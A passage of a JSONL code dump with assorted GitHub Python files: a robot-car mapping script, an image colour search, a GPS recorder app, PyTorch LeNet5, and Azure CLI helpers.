movable=False,\n friction=0.01,\n ))\n\n def debug_show_player_at_location(self, location_x):\n \"\"\"\n Returns rendering of player at specified location, does not affect actual game state.\n :param location_x: (float -1 to 1) show player at location_x\n :return: \"state_pixels\" rendering with player at location_x\n \"\"\"\n old_center = np.copy(self.player.center)\n self.player.center[0] = (location_x + 1) * 50\n frame = self.render(\"state_pixels\")\n self.player.center = old_center\n return frame\n\n def debug_get_player_location(self):\n return (self.player.center[0] - 50) / 50","repo_name":"JBLanier/gym-boxpush","sub_path":"gym_boxpush/envs/boxpushmaze.py","file_name":"boxpushmaze.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"74938547021","text":"import picar_4wd as fc\nimport numpy as np\nfrom math import sin, cos, radians, sqrt\n\n#changing print settings to display large arrays\nimport sys\nnp.set_printoptions(suppress=True,linewidth=sys.maxsize,threshold=sys.maxsize)\n\ndef supersonic_scan():\n '''\n This function moves the supersonic sensor 180 degrees\n and records angle & distance tuples into list supersonic_data.\n '''\n #declaring variables\n STEP = 10\n ANGLE_RANGE = 180\n max_angle = ANGLE_RANGE/2\n min_angle = -ANGLE_RANGE/2\n us_step = STEP\n supersonic_data = []\n current_angle = -90\n\n #scanning 180 degrees and returning (angle,distance) tuples as a list called supersonic_data\n for step in range(int(current_angle), int(ANGLE_RANGE/2)+STEP, STEP):\n supersonic_data.append((current_angle,fc.get_distance_at(current_angle)))\n current_angle += us_step\n if current_angle >= max_angle:\n current_angle = max_angle\n us_step = -STEP\n elif current_angle <= min_angle:\n current_angle = min_angle\n us_step = STEP\n return supersonic_data\n\ndef get_coords(car_position, car_direction, angle, distance, scale = 5):\n '''\n Converts polar angle + distance tuples into cartesian coords originating at our car,\n which is located at the bottom center where the angle is measured such that\n -90 degrees is directly to the left of the car and 90 degrees is the right.\n scale will change the scale of the numpy map using floor division rounding, defaulting to 5cm.\n Accounts for direction of the car in relation to the master_map. \n Only works if the car is pointing straight, left or right.\n '''\n x = round((distance // scale) * cos(radians(90-angle)))\n y = round((distance // scale) * sin(radians(90-angle)))\n if cos(radians(car_direction)) == 1:\n return car_position[0]-y, car_position[1]+x\n elif sin(radians(car_direction)) == 1:\n return car_position[0]+x, car_position[1]+y\n elif sin(radians(car_direction)) == -1:\n return car_position[0]-x, car_position[1]-y\n else:\n raise Exception(\"Car turned around!\")\n\ndef cartesian_distance(pta, ptb):\n '''\n Returns the distance between two points given two tuples of coordinates.\n '''\n dist = sqrt((ptb[0]-pta[0])**2 + (ptb[1]-pta[1])**2)\n return dist\n\ndef dda_line(obj1,obj2,grid,threshold=4):\n '''\n Draws '1's in numpy array if two points meet the minimum distance threshhold \n using the digital differential analyzer (dda) Line Generation Algorithm from computer graphics. \n Default threshhold is 4 since the car is roughly 18cm and we are using a 1:5 scale. \n '''\n\n #Checks if objects are closer together than the width of the car then draws the appropriate line\n\n #Creates steps based on whether the two points are further in the X or Y direction\n if 0 < cartesian_distance(obj1,obj2) <= threshold:\n dy = int(obj2[1]-obj1[1])\n dx = int(obj2[0]-obj1[0])\n if 0 < abs(dx) >= abs(dy):\n steps = int(abs(dx))\n elif 0 < abs(dy) > abs(dx):\n steps = int(abs(dy))\n\n #establishes increments and coordinates for each point and initializes list 'coordinates' \n xinc = dx/steps\n yinc = dy/steps\n x = obj1[0]\n y = obj1[1]\n coordinates = []\n i = 0\n\n #appends coordinates to list and adds them to the grid\n while i < steps:\n i += 1\n x = x + xinc\n y = y + yinc\n coordinates.append((x,y))\n for coord in coordinates:\n grid[int(coord[0]),int(coord[1])] = 1\n return grid\n\ndef place_objects(supersonic_data, car_position, car_direction, grid):\n '''\n Supersonic_data is a list of polar coordinate tuples in the form (angle, distance).\n Objects detected in supersonice_data are recorded onto the grid with a '1',\n those close enough to each other will be combined with dda_line. \n '''\n\n\n \n #Option to create grid with car located at bottom center with input variable gridsize\n #grid = np.zeros(gridsize, dtype=np.int32)\n #car_position = (-1,int(grid.shape[1]/2))\n #grid[car_position] = 8 \n\n #Alternative method to create grid based on furthest object detected and car location:\n #furthest = int(max(supersonic_data, key=lambda x:x[1])[1])\n #gridsize = (furthest, furthest+1)\n\n #writing '1's to the grid for recognized data and recording those points in [gridcoords]\n gridcoords = []\n for datum in supersonic_data:\n gridcoords.append(get_coords(car_position,car_direction,*datum))\n grid[get_coords(car_position,car_direction,*datum)] = 1\n \n #using gridcoords to draw lines between close objects on the grid\n for i in range(1,len(gridcoords)):\n dda_line(gridcoords[i-1],gridcoords[i],grid)\n \n return grid\n'''\nTest Example:\nif __name__ == \"__main__\":\n grid = np.zeros((50,51), dtype=np.int32)\n car_position = (-1,int(grid.shape[1]/2))\n grid[car_position] = 8\n supersonic_data = supersonic_scan()\n print(place_objects(supersonic_data, car_position,0,grid))\n\n'''\n","repo_name":"jzhan2543/iot-lab1","sub_path":"numpymap.py","file_name":"numpymap.py","file_ext":"py","file_size_in_byte":5123,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"40473394223","text":"from mpi4py import MPI\nfrom mpishuffler import shuffle\n\n\ndef load_super_huge_data():\n return [\"apple\", \"banana\", \"dekopon\"]\n\n\ndef main():\n comm = MPI.COMM_WORLD\n rank = comm.Get_rank()\n local_data = []\n if rank == 0:\n local_data = load_super_huge_data()\n received_payload = []\n shuffle(local_data, received_payload, comm)\n print(f\"rank {rank} reveived {received_payload}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"undertherain/mpishuffler","sub_path":"example/simple.py","file_name":"simple.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"73970268302","text":"from PIL import Image\n\n\nclass himagesearch:\n def __init__(self, image: Image):\n self.image = image\n pass\n def findMultiColorInRegionFuzzy(self, color, color_positions, degree, x1, y1, x2, y2):\n degree = 100 - degree\n # Load the image\n # image = Image.open(r\"C:\\Users\\Admin\\Pictures\\Screenshots\\Capture.PNG\")\n image = self.image\n # Convert the color to RGB\n r = (color & 0xFF0000) >> 16\n g = (color & 0x00FF00) >> 8\n b = (color & 0x0000FF)\n color_rgb = (r, g, b)\n color_positions = color_positions.split(\",\")\n # Loop through the region of the image\n for y in range(y1, y2):\n for x in range(x1, x2):\n # Get the color at the current position\n current_color = image.getpixel((x, y))\n if len(current_color) == 4: # PNG image\n current_color = current_color[:3] # Ignore the alpha channel\n # Check if the current color matches the reference color\n if current_color == color_rgb:\n\n # Check if the colors around the current position match\n lis = []\n lis2 = []\n for pos in color_positions:\n dx, dy, ref_color = pos.split(\"|\")\n dx = int(dx)\n dy = int(dy)\n r = (int(ref_color, 16) & 0xFF0000) >> 16\n g = (int(ref_color, 16) & 0x00FF00) >> 8\n b = (int(ref_color, 16) & 0x0000FF)\n ref_color_rgb = (r, g, b)\n newx = x + dx\n newy = y + dy\n # Get the color at the position around the current position\n if newx <= 0 or newy <= 0:\n lis.append(\"False\")\n break\n around_color = image.getpixel((newx, newy))\n\n # Check if the color around the current position matches the reference color with the specified degree of fuzziness\n if (around_color[0] >= ref_color_rgb[0] - degree and around_color[0] <= ref_color_rgb[0] + degree\n and around_color[1] >= ref_color_rgb[1] - degree and around_color[1] <= ref_color_rgb[1] + degree\n and around_color[2] >= ref_color_rgb[2] - degree and around_color[2] <= ref_color_rgb[2] + degree):\n # hex_color_code = '0x{:02X}{:02X}{:02X}'.format(around_color[0],around_color[1],around_color[2])\n # lis2.append((newx, newy, hex_color_code))\n lis.append(\"True\")\n else:\n lis.append(\"False\")\n break\n if \"False\" in lis:\n continue\n # print(lis2)\n return x, y\n\n return (0,0)\n\nfrom hwin import *\nexe = r\"C:\\Program Files\\Privax\\HMA VPN\\VyprVPN.exe\"\nif not hfile.checkExists(exe):\n exe = r\"C:\\Program Files (x86)\\HMA VPN\\VyprVPN.exe\"\nnameexe = hfile.getFilenameWithoutExtension(exe)\nhwnd = None\npids = hwin.getPidsOfProcess(nameexe)\n\nfor pid in pids:\n if hwnd:\n break\n hwnds = hwin.getHandlesByPid(pid)\n size = None\n if len(hwnds) == 1:\n hwnd = hwnds[0]\n else:\n for i in hwnds:\n isize = hwin.getClientSizeByHandle(i)\n if isize[1] == 570:\n hwnd = i\n size = isize\n break\nimage = hwin.captureHandle(hwnd)\nimage.save(r\"C:\\Users\\Admin\\Pictures\\Screenshots\\abc.png\")\nhi = himagesearch(image)\n# x,y = findMultiColorInRegionFuzzy( 0x472814, \"-335|-221|0xefa037,-435|-465|0xfff3c3,10|-473|0xfae474,238|-449|0xfceb5f,39|-216|0xcb6b04,-310|-64|0x7f6669,-491|10|0x663a2d,-136|65|0x553c38,-344|-256|0xfbaa27\", 90, 0, 0, 1023, 575)\nfindMultiColorInRegionFuzzy = hi.findMultiColorInRegionFuzzy\nx,y = findMultiColorInRegionFuzzy( 0x6f767c, \"6|7|0x6f767c,-12|-79|0x12a1fc,-194|-74|0x0978fb,-150|-374|0xc1c1c1,-132|-436|0xd6d6d6\", 90, 0, 0, 375, 606)\n\nprint(x,y)\n","repo_name":"emga9xkc2/check-mail-gmx-private","sub_path":"t3.py","file_name":"t3.py","file_ext":"py","file_size_in_byte":4218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"13227573126","text":"def liveblog_order(request):\n valid_orders = {'asc': '-pub_date',\n 'desc': 'pub_date', }\n order = valid_orders['asc'] # default\n if request.GET:\n if request.GET.has_key('order'):\n selected_order = request.GET['order']\n if selected_order in valid_orders.keys():\n order = valid_orders[selected_order]\n return {'liveblog_order': order, }\n","repo_name":"bycoffe/django-liveblog","sub_path":"context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"2127667495","text":"from setuptools import setup, find_namespace_packages\n\ninstall_requires = [\n 'GitPython', 'tensorboardX', 'matplotlib', 'wandb', 'fabric', 'cloudpickle'\n]\n\nsetup(\n name='mila_tools',\n version='0.0.1',\n packages=[\"mila_tools\", \"slurm_scripts\"],\n package_data={'': ['*.sh']},\n url='github.com/manuel-delverme/mila_tools/',\n license='',\n author='Manuel Del Verme',\n author_email='',\n description='',\n install_requires=install_requires,\n)\n","repo_name":"manuel-delverme/mila_tools","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"47"} +{"seq_id":"41423324606","text":"#\\input texinfo\n#coding: utf-8\n\n# Put your script (and all resources that it needs for running) in this folder.\n# The filename of the main script should be \"main.py\".\n\nimport ui, location, dialogs, time, console, math, urllib, requests, console\nstop = True\nlastloc = None\ncurloc = None\ndebug = False\n\n\n\n\n\nview = ui.View()\nview=ui.View()\nview.frame = (0, 0, 320, 430)\nview.name = 'GPS RECORDER'\nview.enabled = True\nview.tint_color = (0.000000,0.478000,1.000000,1.000000)\nview.border_color = (0.000000,0.000000,0.000000,1.000000)\nview.background_color = (1.000000,1.000000,1.000000,1.000000)\nview.flex = 'LR'\n\n\n\n\n\n# start the GPS in the device.\n# want this was a button because running the gps uses a lot of battery life\n\ndef button_startgps(sender):\n location.start_updates()\n\n\n if location.is_authorized():\n location.start_updates()\n dialogs.hud_alert('GPS Started', 'success', 1)\n else:\n dialogs.alert('App not authorized to use GPS. Enable GPS in system preferences.', 'Plz fix', 'Oh rats... gonna fix that now', hide_cancel_button=True)\n\n\ndef clear(sender):\n console.clear()\n\n# allow user to stop the gps receiver to save battery\ndef button_stopgps(sender):\n location.stop_updates()\n dialogs.hud_alert('GPS stopped','success', 1)\n\n# print the current location\ndef button_print_pos(sender):\n global debug, v\n debug = not debug\n\n if debug:\n v['button_position'].background_color = 'white'\n v['button_position'].title='Turn Debug Off'\n else:\n v['button_position'].background_color = 'white'\n v['button_position'].title='Turn Debug On'\n\n# record the gps signal to a file and warn if the accuracy is poor\ndef button_record(sender):\n # code here\n global curloc, lastloc\n lastloc=curloc\n curloc = location.get_location()\n name=dialogs.input_alert(\"Enter Name\", \"Name:\",\"John Doe\", hide_cancel_button=False)\n curloc = location.get_location()\n if curloc['horizontal_accuracy']>5:\n dialogs.hud_alert(\"Poor GPS accuracy\", 'error', 1)\n count=0\n while count<10 and curloc[\"horizontal_accuracy\"]>5:\n curloc=location.get_location()\n count+=1\n dialogs.hud_alert('Location Recorded', 'success', 1)\n else:\n dialogs.hud_alert('Location Recorded', 'success', 1)\n\n\n form_url = 'https://docs.google.com/forms/d/e/1FAIpQLSeYmR_PSpxeeE1pJEP83Ui_eqz4OA6tqqx35cfPX1VL2mfd0g/formResponse'\n\n form_postbody = {'entry.598678340':str(curloc['longitude']), 'entry.1352477612':str(curloc['latitude']), 'entry.1482071151':str(curloc['horizontal_accuracy']), 'entry.1391268977':urllib.parse.quote(str(name)), 'draftResponse':[], 'pageHistory':0}\n\n form_headers = {'Referer':'https://docs.google.com/forms/d/e/1FAIpQLSeYmR_PSpxeeE1pJEP83Ui_eqz4OA6tqqx35cfPX1VL2mfd0g/viewform'}\n\n try:\n val = requests.post(form_url, data=form_postbody, headers=form_headers)\n except:\n console.hud_alert('Error on upload', 'failure', 1)\n\n\n# stop the program WORKS\ndef button_stop(sender):\n global stop\n #alertval = dialogs.alert('Press cancel to stop', '', '', 'Keep Going', hide_cancel_button=True)\n stop=False\n\n\ndef gpsdistance(lat1, lng1, lat2, lng2):\n #return distance as meter if you want km distance, remove \"* 1000\"\n radius = 6371 * 1000\n\n dLat = (lat2-lat1) * math.pi / 180\n dLng = (lng2-lng1) * math.pi / 180\n\n lat1 = lat1 * math.pi / 180\n lat2 = lat2 * math.pi / 180\n\n val = math.sin(dLat/2) * math.sin(dLat/2) + math.sin(dLng/2) * math.sin(dLng/2) * math.cos(lat1) * math.cos(lat2)\n ang = 2 * math.atan2(math.sqrt(val), math.sqrt(1-val))\n return radius * ang\n\n\n\nrecord_button = ui.Button()\nrecord_button.frame = (74, 155, 180, 180)\nrecord_button.flex = 'LR'\nrecord_button.corner_radius = 90\nrecord_button.background_color = (0.000000,0.742925,0.000000,1.000000)\nrecord_button.border_color = (1.000000,0.000000,0.000000,1.000000)\nrecord_button.border_width = 5\nrecord_button.title = 'RECORD'\nrecord_button.action = button_record\nrecord_button.font_bold = True\nrecord_button.name = 'record_button'\nrecord_button.font_size = 30\n\ndist_label = ui.Label()\ndist_label.frame = (74, 57, 180, 70)\ndist_label.font_size = 18\ndist_label.corner_radius = 10\ndist_label.number_of_lines = 2\ndist_label.border_width = 2\ndist_label.alignment = ui.ALIGN_CENTER\ndist_label.text = 'Feet Since Last Measurement'\ndist_label.font_name = ''\ndist_label.name = 'distance'\ndist_label.flex = 'LR'\n\n\nstartgps_button = ui.Button()\nstartgps_button.frame = (22, 356, 131, 50)\nstartgps_button.font_size = 15\nstartgps_button.corner_radius = 17\nstartgps_button.background_color = (0.563837,0.768868,0.563837,1.000000)\nstartgps_button.border_width = 0\nstartgps_button.title = 'Start GPS'\nstartgps_button.action = button_startgps\nstartgps_button.alpha = 1\nstartgps_button.font_bold = True\nstartgps_button.name = 'startgps'\nstartgps_button.flex = 'LR'\n\n\n\nstopgps_button = ui.Button()\nstopgps_button.frame = (174, 356, 131, 50)\nstopgps_button.font_size = 15\nstopgps_button.corner_radius = 17\nstopgps_button.background_color = (1.000000,0.633333,0.633333,1.000000)\nstopgps_button.border_width = 0\nstopgps_button.title = 'Stop GPS'\nstopgps_button.action = button_stopgps\nstopgps_button.alpha = 1\nstopgps_button.font_bold = True\nstopgps_button.name = 'stopgps'\nstopgps_button.flex = 'LR'\n\n\nstop_button = ui.Button()\nstop_button.frame = (174, 424, 114, 50)\nstop_button.border_width = 0\nstop_button.flex = 'LR'\nstop_button.action = button_stop\nstop_button.title = 'STOP'\nstop_button.corner_radius = 10\nstop_button.background_color = (1.000000,0.000000,0.000000,1.000000)\nstop_button.name = 'button_stop'\nstop_button.font_size = 36\n\nstop_button_2 = ui.Button()\nstop_button_2.frame = (39, 424, 114, 50)\nstop_button_2.border_width = 0\nstop_button_2.action = clear\nstop_button_2.title = 'CLEAR'\nstop_button_2.corner_radius = 10\nstop_button_2.background_color = (1.000000,0.000000,0.000000,1.000000)\nstop_button_2.name = 'button_stop'\nstop_button_2.font_size = 36\n\n\n\ndebug_button = ui.Button()\ndebug_button.frame = (97, 6, 127, 50)\ndebug_button.border_width = 0\ndebug_button.action = button_print_pos\ndebug_button.title = 'Debug Mode'\ndebug_button.corner_radius = 10\ndebug_button.background_color = (1.000000,1.000000,1.000000,1.000000)\ndebug_button.name = 'button_position'\ndebug_button.font_size = 18\n\n\n\n\n\n\n#v = ui.load_view()\n#v.present('Full_Screen', hide_title_bar=False,animated=False)\n\nrecbutton = v['record_button']\ndistance = v['distance']\n\nlastloc=location.get_location()\n\n# main loop\n# repeatedly get a new location and show\n# the user if the gps is accurate enough\n# yay the break works\nwhile stop:\n if not stop:\n console.hud_alert('Stopped!')\n break\n curloc = location.get_location()\n accuracy=curloc['horizontal_accuracy']\n\n if accuracy>5:\n recbutton.background_color='red'\n else:\n recbutton.background_color='green'\n\n curlong=curloc['longitude']\n curlat=curloc['latitude']\n lastlong=lastloc['longitude']\n lastlat=lastloc['latitude']\n\n distance.text = 'Distance since last record: ' + str(round(gpsdistance(lastlat,lastlong, curlat, curlong))) + ' meters'\n\n if debug:\n console.alert(str(curloc), \"\", \"OK\", hide_cancel_button=True)\n\n console.alert(str('Postion: '+str(curloc['latitude'])+' '+str(curloc['longitude'])), \"\", \"OK\", hide_cancel_button=True)\n\n console.alert(str('Distance since last record: ' + str(gpsdistance(lastlat,lastlong, curlat, curlong)) + ' meters'), \"\", \"OK\", hide_cancel_button=True)\n\n time.sleep(5)\n","repo_name":"b-j-m/GPS-Recorder","sub_path":"GPSRecorderApp.py","file_name":"GPSRecorderApp.py","file_ext":"py","file_size_in_byte":7424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"12221634175","text":"import torch\nfrom torch import nn\nfrom torch.nn import functional as F\n\n\nclass LeNet5(nn.Module):\n \"\"\"\n for cifar10 dataset.\n \"\"\"\n\n def __init__(self):\n super(LeNet5, self).__init__()\n\n self.conv_unit = nn.Sequential(\n # x: [b,3,32,32] -> [b,6,28,28]\n nn.Conv2d(3, 6, kernel_size=5, stride=1, padding=0),\n nn.AvgPool2d(kernel_size=2, stride=2, padding=0),\n #\n nn.Conv2d(6, 16, kernel_size=5, stride=1, padding=0),\n nn.AvgPool2d(kernel_size=2, stride=2, padding=0),\n\n )\n\n # flatten\n # fc unit\n self.fc_unit = nn.Sequential(\n nn.Linear(16 * 5 * 5, 120),\n nn.ReLU(),\n nn.Linear(120, 84),\n nn.ReLU(),\n nn.Linear(84, 10)\n )\n\n def forward(self, x):\n \"\"\"\n :param x: [b,3,32,32]\n :return:\n \"\"\"\n batch_size = x.size(0) # size(0)返回[b,3,32,32]的b\n # [b,3,32,32] -> [b,16,5,5]\n x = self.conv_unit(x)\n # [b,16,5,5] -> [b,16*6*6] Flatten\n x = x.view(batch_size, 16 * 5 * 5)\n # [b,16*5*5] -> [b,10]\n logits = self.fc_unit(x)\n\n return logits\n\n\ndef main():\n net = LeNet5()\n temp = torch.randn(2, 3, 32, 32)\n out = net(temp)\n print('LeNet5 out: ', out.shape)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"zhuozhudd/PyTorch-Course-Note","sub_path":"ch08_CIFAR10_ResNet/LeNet5.py","file_name":"LeNet5.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"47"} +{"seq_id":"17779440566","text":"import subprocess\nimport time\n\nfrom azure.cli.core.azclierror import UnclassifiedUserFault\n\nfrom .spinner import Spinner\nfrom .logger import logger, is_verbose\n\n\ndef run_shell_command(command, combine_std=True):\n # if --verbose, don't capture stderr\n stderr = None\n if combine_std:\n stderr = None if is_verbose() else subprocess.STDOUT\n output = subprocess.check_output(command, universal_newlines=True, stderr=stderr)\n logger.info(\"%s returned:\\n%s\", \" \".join(command), output)\n return output\n\n\ndef message_variants(template_msg):\n # Find the first word and assume it's a capitalized verb.\n verb, predicate = template_msg.split(\" \", 1)\n begin_msg = f\"{verb[:-1]}ing {predicate}\" if verb.endswith(\"e\") else f\"{verb}ing {predicate}\"\n end_msg = f\"✓ {verb}d {predicate}\" if verb.endswith(\"e\") else f\"✓ {verb}ed {predicate}\"\n error_msg = f\"✗ Failed to {verb.lower()} {predicate}\"\n return begin_msg, end_msg, error_msg\n\n\ndef try_command_with_spinner(cmd, command, spinner_msg, include_error_stdout=False):\n begin_msg, end_msg, err_msg = message_variants(spinner_msg)\n with Spinner(cmd, begin_msg, end_msg):\n try:\n run_shell_command(command)\n except (subprocess.CalledProcessError, FileNotFoundError) as err:\n if include_error_stdout:\n err_msg += f\"\\n{err.stdout}\"\n raise UnclassifiedUserFault(err_msg) from err\n\n\ndef retry_shell_command(command, attempts=100, delay=3):\n \"\"\"Run a shell command, retrying a number of times with a specified delay if it fails.\"\"\"\n output = \"\"\n for i in range(attempts):\n try:\n output = run_shell_command(command)\n break\n except subprocess.CalledProcessError as err:\n logger.info(err)\n if i == attempts - 1:\n raise\n time.sleep(delay)\n return output\n","repo_name":"Azure/azure-capi-cli-extension","sub_path":"src/capi/azext_capi/helpers/run_command.py","file_name":"run_command.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"47"} +{"seq_id":"24941105575","text":"from __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport argparse\nimport cmd\nfrom datetime import datetime\nimport os\nimport stat\nimport sys\n\nfrom azure.datalake.store.core import AzureDLFileSystem\nfrom azure.datalake.store.multithread import ADLDownloader, ADLUploader\nfrom azure.datalake.store.utils import write_stdout\n\n\nclass AzureDataLakeFSCommand(cmd.Cmd, object):\n \"\"\"Accept commands via an interactive prompt or the command line.\"\"\"\n\n prompt = 'azure> '\n undoc_header = None\n _hidden_methods = ('do_EOF',)\n\n def __init__(self, fs):\n super(AzureDataLakeFSCommand, self).__init__()\n self._fs = fs\n\n def get_names(self):\n return [n for n in dir(self.__class__) if n not in self._hidden_methods]\n\n def do_close(self, line):\n return True\n\n def help_close(self):\n print(\"close\\n\")\n print(\"Exit the application\")\n\n def do_cat(self, line):\n parser = argparse.ArgumentParser(prog=\"cat\", add_help=False)\n parser.add_argument('files', type=str, nargs='+')\n args = parser.parse_args(line.split())\n\n for f in args.files:\n write_stdout(self._fs.cat(f))\n\n def help_cat(self):\n print(\"cat file ...\\n\")\n print(\"Display contents of files\")\n\n def do_chgrp(self, line):\n parser = argparse.ArgumentParser(prog=\"chgrp\", add_help=False)\n parser.add_argument('group', type=str)\n parser.add_argument('files', type=str, nargs='+')\n args = parser.parse_args(line.split())\n\n for f in args.files:\n self._fs.chown(f, group=args.group)\n\n def help_chgrp(self):\n print(\"chgrp group file ...\\n\")\n print(\"Change file group\")\n\n def do_chmod(self, line):\n parser = argparse.ArgumentParser(prog=\"chmod\", add_help=False)\n parser.add_argument('mode', type=str)\n parser.add_argument('files', type=str, nargs='+')\n args = parser.parse_args(line.split())\n\n for f in args.files:\n self._fs.chmod(f, args.mode)\n\n def help_chmod(self):\n print(\"chmod mode file ...\\n\")\n print(\"Change file permissions\")\n\n def _parse_ownership(self, ownership):\n if ':' in ownership:\n owner, group = ownership.split(':')\n if not owner:\n owner = None\n else:\n owner = ownership\n group = None\n return owner, group\n\n def do_chown(self, line):\n parser = argparse.ArgumentParser(prog=\"chown\", add_help=False)\n parser.add_argument('ownership', type=str)\n parser.add_argument('files', type=str, nargs='+')\n args = parser.parse_args(line.split())\n\n owner, group = self._parse_ownership(args.ownership)\n\n for f in args.files:\n self._fs.chown(f, owner=owner, group=group)\n\n def help_chown(self):\n print(\"chown owner[:group] file ...\")\n print(\"chown :group file ...\\n\")\n print(\"Change file owner and group\")\n\n def _display_dict(self, d):\n width = max([len(k) for k in d.keys()])\n for k, v in sorted(list(d.items())):\n print(\"{0:{width}} = {1}\".format(k, v, width=width))\n\n def do_df(self, line):\n parser = argparse.ArgumentParser(prog=\"df\", add_help=False)\n parser.add_argument('path', type=str, nargs='?', default='.')\n args = parser.parse_args(line.split())\n\n self._display_dict(self._fs.df(args.path))\n\n def help_df(self):\n print(\"df [path]\\n\")\n print(\"Display Azure account statistics of a path\")\n\n def _truncate(self, num, fmt):\n return '{:{fmt}}'.format(num, fmt=fmt).rstrip('0').rstrip('.')\n\n def _format_size(self, num):\n for unit in ['B', 'K', 'M', 'G', 'T']:\n if abs(num) < 1024.0:\n return '{:>4s}{}'.format(self._truncate(num, '3.1f'), unit)\n num /= 1024.0\n return self._truncate(num, '.1f') + 'P'\n\n def _display_path_with_size(self, name, size, human_readable):\n if human_readable:\n print(\"{:7s} {}\".format(self._format_size(size), name))\n else:\n print(\"{:<9d} {}\".format(size, name))\n\n def do_du(self, line):\n parser = argparse.ArgumentParser(prog=\"du\", add_help=False)\n parser.add_argument('files', type=str, nargs='*', default=[''])\n parser.add_argument('-c', '--total', action='store_true')\n parser.add_argument('-h', '--human-readable', action='store_true')\n parser.add_argument('-r', '--recursive', action='store_true')\n args = parser.parse_args(line.split())\n\n total = 0\n for f in args.files:\n items = sorted(list(self._fs.du(f, deep=args.recursive).items()))\n for name, size in items:\n total += size\n self._display_path_with_size(name, size, args.human_readable)\n if args.total:\n self._display_path_with_size(\"total\", total, args.human_readable)\n\n def help_du(self):\n print(\"du [-c | --total] [-r | --recursive] [-h | --human-readable] [file ...]\\n\")\n print(\"Display disk usage statistics\")\n\n def do_exists(self, line):\n parser = argparse.ArgumentParser(prog=\"exists\", add_help=False)\n parser.add_argument('file', type=str)\n args = parser.parse_args(line.split())\n\n print(self._fs.exists(args.file, invalidate_cache=False))\n\n def help_exists(self):\n print(\"exists file\\n\")\n print(\"Check if file/directory exists\")\n\n def do_get(self, line):\n parser = argparse.ArgumentParser(prog=\"get\", add_help=False)\n parser.add_argument('remote_path', type=str)\n parser.add_argument('local_path', type=str, nargs='?', default='.')\n parser.add_argument('-b', '--chunksize', type=int, default=2**28)\n parser.add_argument('-c', '--threads', type=int, default=None)\n parser.add_argument('-f', '--force', action='store_true')\n args = parser.parse_args(line.split())\n\n ADLDownloader(self._fs, args.remote_path, args.local_path,\n nthreads=args.threads, chunksize=args.chunksize,\n overwrite=args.force)\n\n def help_get(self):\n print(\"get [option]... remote-path [local-path]\\n\")\n print(\"Retrieve the remote path and store it locally\\n\")\n print(\"Options:\")\n print(\" -b \")\n print(\" --chunksize \")\n print(\" Set size of chunk to retrieve atomically, in bytes.\\n\")\n print(\" -c \")\n print(\" --threads \")\n print(\" Set number of multiple requests to perform at a time.\")\n print(\" -f\")\n print(\" --force\")\n print(\" Overwrite an existing file or directory.\")\n\n def do_head(self, line):\n parser = argparse.ArgumentParser(prog=\"head\", add_help=False)\n parser.add_argument('files', type=str, nargs='+')\n parser.add_argument('-c', '--bytes', type=int, default=1024)\n args = parser.parse_args(line.split())\n\n for f in args.files:\n write_stdout(self._fs.head(f, size=args.bytes))\n\n def help_head(self):\n print(\"head [-c bytes | --bytes bytes] file ...\\n\")\n print(\"Display first bytes of a file\")\n\n def do_info(self, line):\n parser = argparse.ArgumentParser(prog=\"info\", add_help=False)\n parser.add_argument('files', type=str, nargs='+')\n args = parser.parse_args(line.split())\n\n for f in args.files:\n self._display_dict(self._fs.info(f, invalidate_cache=False))\n\n def help_info(self):\n print(\"info file ...\\n\")\n print(\"Display file information\")\n\n def _display_item(self, item, human_readable):\n mode = int(item['permission'], 8)\n\n if item['type'] == 'DIRECTORY':\n permissions = \"d\"\n elif item['type'] == 'SYMLINK':\n permissions = \"l\"\n else:\n permissions = \"-\"\n\n permissions += \"r\" if bool(mode & stat.S_IRUSR) else \"-\"\n permissions += \"w\" if bool(mode & stat.S_IWUSR) else \"-\"\n permissions += \"x\" if bool(mode & stat.S_IXUSR) else \"-\"\n permissions += \"r\" if bool(mode & stat.S_IRGRP) else \"-\"\n permissions += \"w\" if bool(mode & stat.S_IWGRP) else \"-\"\n permissions += \"x\" if bool(mode & stat.S_IXGRP) else \"-\"\n permissions += \"r\" if bool(mode & stat.S_IROTH) else \"-\"\n permissions += \"w\" if bool(mode & stat.S_IWOTH) else \"-\"\n permissions += \"x\" if bool(mode & stat.S_IXOTH) else \"-\"\n\n timestamp = item['modificationTime'] // 1000\n modified_at = datetime.fromtimestamp(timestamp).strftime('%b %d %H:%M')\n\n if human_readable:\n size = \"{:5s}\".format(self._format_size(item['length']))\n else:\n size = \"{:9d}\".format(item['length'])\n\n print(\"{} {} {} {} {} {}\".format(\n permissions,\n item['owner'][:8],\n item['group'][:8],\n size,\n modified_at,\n os.path.basename(item['name'])))\n\n def do_ls(self, line):\n parser = argparse.ArgumentParser(prog=\"ls\", add_help=False)\n parser.add_argument('dirs', type=str, nargs='*', default=[''])\n parser.add_argument('-h', '--human-readable', action='store_true')\n parser.add_argument('-l', '--detail', action='store_true')\n args = parser.parse_args(line.split())\n\n for d in args.dirs:\n for item in self._fs.ls(d, detail=args.detail, invalidate_cache=False):\n if args.detail:\n self._display_item(item, args.human_readable)\n else:\n print(os.path.basename(item))\n\n def help_ls(self):\n print(\"ls [-h | --human-readable] [-l | --detail] [file ...]\\n\")\n print(\"List directory contents\")\n\n def do_mkdir(self, line):\n parser = argparse.ArgumentParser(prog=\"mkdir\", add_help=False)\n parser.add_argument('dirs', type=str, 